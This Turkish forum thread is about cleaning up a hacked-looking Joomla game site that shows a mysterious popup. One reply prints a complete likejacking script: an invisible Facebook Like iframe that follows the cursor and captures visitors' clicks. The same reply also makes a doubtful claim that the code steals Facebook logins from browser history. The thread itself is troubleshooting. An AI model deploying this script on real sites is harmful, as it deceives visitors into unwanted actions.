halldemediğim bi sıkıntım var...

Kodla Büyü
lyon-85

lyon-85

Aktif Üye
Mesajlar
114
siteyi açınca splash screen benzeri bişey çıkıyo ve
"reklam görüntülenemedi! pencereyi kapatmak için tıklayın" diyo.
bunu kapatmak için ne yapabilirim.ben yapmadım nerden geldiğini de bilmiyorum bunun. söylediğim şey www.guzeloyunoyna.net adresinde. bi bakarsanız çok sevinecem. Allah razı olsun...
 
firefoxtan ve explorerdan girdim siteye. ikisindede bahsettiğiniz durumla karşılaşmadım hocam.
 
işte hocam sebebi buyur...
 

Ekli dosyalar

  • Untitled-1.jpg
    Untitled-1.jpg
    332.7 KB · Görüntüleme: 1,218
hocam bu ekran görüntüsü kendiliğinden mi geliyo siteyi açınca yoksa siz taratınca mı geldi. ve çözümüne yönelik bi fikriniz var mı.ne yaptımsa kaldıramıyorum bu saçmalığı şaşırdım kaldım ya.
 
hocam bu www.programciamca.com/test4.php
adresinden gelen ağ trafiğiyle eşleşen bir saldırı imzası var; hostunuz bunu dağıtıyor veya siteye eklediğiniz bir dosya,oyun,js,flash, gibi özgün içerikli tanımlı kod bunu dağıtıyor....bilginize
 
hocam reseller paketi kendimin ve host sağlayıcı kendim sayılırım. server sağlayıcıyı aradım dosyalarda ben göremiyorum bizlik bişey değil dedi. bu ne biçim bişeydir böyle ya
 
ilginç sayın hocam,
ama şu kesin hostta,serverda yada site içeriğinde bu saldırıyı dağıtan bi kodlama var,
ben bi arkadaşlara sorim size dönerim tekrar hocam...
 
sayın hocam
mesele özetle şu
host, server yada site kodları içinde bir js çalışmakta
Buna benzer örnekler var , aşağıdaki örnekteki gibi
------------------------
(function(){
var tempX = 0,
tempY = 0,

IE = ********.all ? true : false;
if (!IE) ********.captureEvents(Event.MOUSEMOVE);

var like = ********.createElement('iframe');
like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*********.********.href*/ 'http://www.facebook.com/GRUPADI') + '&layout=standard&show_faces=true&wi dt h=53&action=like&colorscheme=light&hei ght=80';
like.scrolling = 'no';
like.frameBorder = 0;
like.allowTransparency = 'true';
like.style.border = 0;
like.style.overflow = 'hidden';
like.style.cursor = 'pointer';
like.style.width = '53px';
like.style.height = '23px';
like.style.position = 'absolute';
like.style.opacity = 0; //Would be 0 if really used
********.getElementsByTagName('body')[0].appendChild(like);

window.addEventListener('mousemove', mouseMove, false);

setTimeout(function(){
********.getElementsByTagName('body')[0].removeChild(like);
window.removeEventListener('mousemove', mouseMove, false);
}, 10000);

function mouseMove(e) {
if (IE) {
tempX = event.clientX + ********.body.scrollLeft;
tempY = event.clientY + ********.body.scrollTop;
} else {
tempX = e.pageX;
tempY = e.pageY;
}

if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0;

like.style.top = (tempY - 8) + 'px';
like.style.left = (tempX - 25) + 'px';

return true
}
})();
---------------------
bu kod o sayfaya giriş yapanların belirtilen facebook gurubunu veya sayfasını beğenmesini sağlıyor....
kod bir *.js dosyasından host veya server üzerinden sayfanın herhangi bir yerine tıkladığınızda otomatik olarak çalışıyor.
ancak
SİZİN karşılaştığınız sorun biraz farklı olmakla birlikte temelde aynı mantıktan hareketle oluşturulmuş bir FACEBOOK kimlik avı saldırısı,
sitenizi ziyaret edenlerin o an face leri aktif veya daha önceden o browser ile face e giriş yapılmışsa o bilgileri browser geçmişinden almaya çalışan bir js kodu,
bunu nasıl engelleyeceğinize gelince
hostun tamamını ve server'ı taratmanız ve bu js dosyası ve veya kodu çalıştıran dosyayı bulup imha etmeniz gerekmekte,
artı sitenizin tüm kodlarını ve eklediğiniz tüm özgün içerikleri kontrol etmenizde gerekmekte,
kolay gelsin....
 
hocam ftp deki tüm dosyaları bilgisayara indirdim ve kelime aratarak taradım ama bu script kodları yok. veritabanını da taradım orda da yok. deli etti tüm zamanımı aldı benim. sizin karşılaşmışlığınız var mı bu tür bi sıkıntıyla y :? a...
 
ben de fikrimi belirteyim sitedeki makalelerin bir yedeğini alın hostu sıfırlayın tekrardan joomla kurulumu yapıp herşeyi tekrar yükleyin
 
hocam 333 tane içerik var şimdilik. bunları toptan teker teker mi alacaz ve tekrar yükleyecez. veri tabanını felan nasıl yapacaz.
 
cpanelden phphmyadmin panelinden makaleleri yedekleyeceksin.
yeni siteyi kurduğunda yedeklediğin makaleleri tekrar yükleyeceksin eğer bilmiyorsan burada anlatmak çok zor olur.
google de joomla cpanel makale yedekleme diye arat çıkıyor
ben web sitelerim hata verdiğinde sürekli bu işlemi yapıyorum. önce makaleleri vb. gerekli bozulmayan yerleri yedekliyorum sonra baştan joomla kurulumu yapıp yedekleri geri yüklüyorum ayrıca akeaba yedekleme bileşeniyle haftaDA bir kere tüm sitelerimin yedeklerini alıyorum.
eğer siz de yedek alma alışkanlığınız varsa bu hatayı vermeyen zamana geri yükleyebilirsiniz.

(bu arada sizin sitenizde oluşan sorunun nedeni oyunların kodlamasını büyük ihtimalle siz yapmadınız, bir yerlerden indirdiniz, indirdiğiniz yerler de warez forumlar da olabilir ben wareze karşı değilim fakat warezden indirdiğim tüm dökümanları en ince ayrıntısına kadar incelerim sonra kullanırım. warez ücretsizdir fakat uğraştırır, warezden indirdiğinizi dikkatle inceleyip kullanırsanız bir sorun olmaz)
 
hocam sitedeki oyunlar şimdilik başka yerlerden kodla çekilito ancak ben bunları ilerleyen zamanlarda kendi hostumdan yayınlayacağım. sadece ilk başlarda böyle yapayım dedim. phpmyadmin deki tabloların hepsinin içine teker teker baktım. kodlarda bu sıkıntıya mahal verecek bi durum yok bulamadım ben. bu sıkıntı swf dosyalarından olabilir mi acaba bilmiyorum.çok acayip bişeymiş. ftp deki hiçbir dosyanın içinde kodu yok. veri tabanında yok. o zaman nerdee
 
lyon-85' Alıntı:
hocam sitedeki oyunlar şimdilik başka yerlerden kodla çekilito ancak ben bunları ilerleyen zamanlarda kendi hostumdan yayınlayacağım. sadece ilk başlarda böyle yapayım dedim. phpmyadmin deki tabloların hepsinin içine teker teker baktım. kodlarda bu sıkıntıya mahal verecek bi durum yok bulamadım ben. bu sıkıntı swf dosyalarından olabilir mi acaba bilmiyorum.çok acayip bişeymiş. ftp deki hiçbir dosyanın içinde kodu yok. veri tabanında yok. o zaman nerdee
Genişletmek için tıkla ...
swf dosyalarının içine zararlı kod içeren yazılımlar yüklenebiliyor. sizde sadece swf olarak görünür fakat içinde virüs olabiliyor. son zamanlarda güncellediğiniz veya yeni yüklediğiniz oyun-içerikleri sondan başlayarak sırayla silip deneyin.
 
Hocam sorunu çözebildiniz mi? Yaklaşık bir haftadır ben de aynı sorunla uğraşıyorum. Ne yaptıysam sorunu çözemedim. Host firması da sorunu çözmüyor. Sorunu çözebilmek için ne yapabilirim şaştım kaldım :( Son olarak bugün adamlara alanımdaki tüm klasörleri sıfırlamalarını ve joomlayı yeniden kurmalarını söyledim. Bu işlemden sonra ftp bilgilerimi de değişmelerini istedim. Az önce gelen cevapta (aynen aktarıyorum): Hangi joomla versiyonunu istiyorsunuz? İndirebileceğimiz bir link var mı? (ikinci soru biraz tuhaf geldi bana)
diye sormuşlar. Ben bir önceki siteyi joomlanın 1.5.24 sürümünü kullanarak tasarlamıştım. Şimdi hangi versiyonu önermeliyim? ve son olarak izlediğim yol doğru mu?
 
hocam sorunu çözdük çok şükür biz. çözümünü söyleyim aynen siz de öyle yapın. ilk önce sitenizin yedeğini alın hocam. direct admin veya cpanelden. hangisini kullanıyosanız. sonra .zip halindeki joomla sürümünü yeniden indirin ve klasöre çıkartın. sonra da ftp ye bu klasörleri yollayın. ancak dikkat edin configuration.php yi değiştirmeyin. dosyaları ftp ye attığınızda diğer dosyalarla değiştirilsin mi diye soracak siz orda üzerine yazmasını ve tüm aynı işlem için geçerli işlemi yapmasını işaretleyin ve tüm dosyaları filezilla ile ftp ye yükleyin. sorun Allah ın izniyle düzelecektir. yapamassanız beraber bakabiliriz hocam. selametle Allah yardımcınız olsun. ben deli oldum düşüne düşüne ve çok şükür bi arkadaşla beraber yapabildik.
 
Cevap yazmak için giriş yap yada kayıt ol.
BBNET
Geri
Üst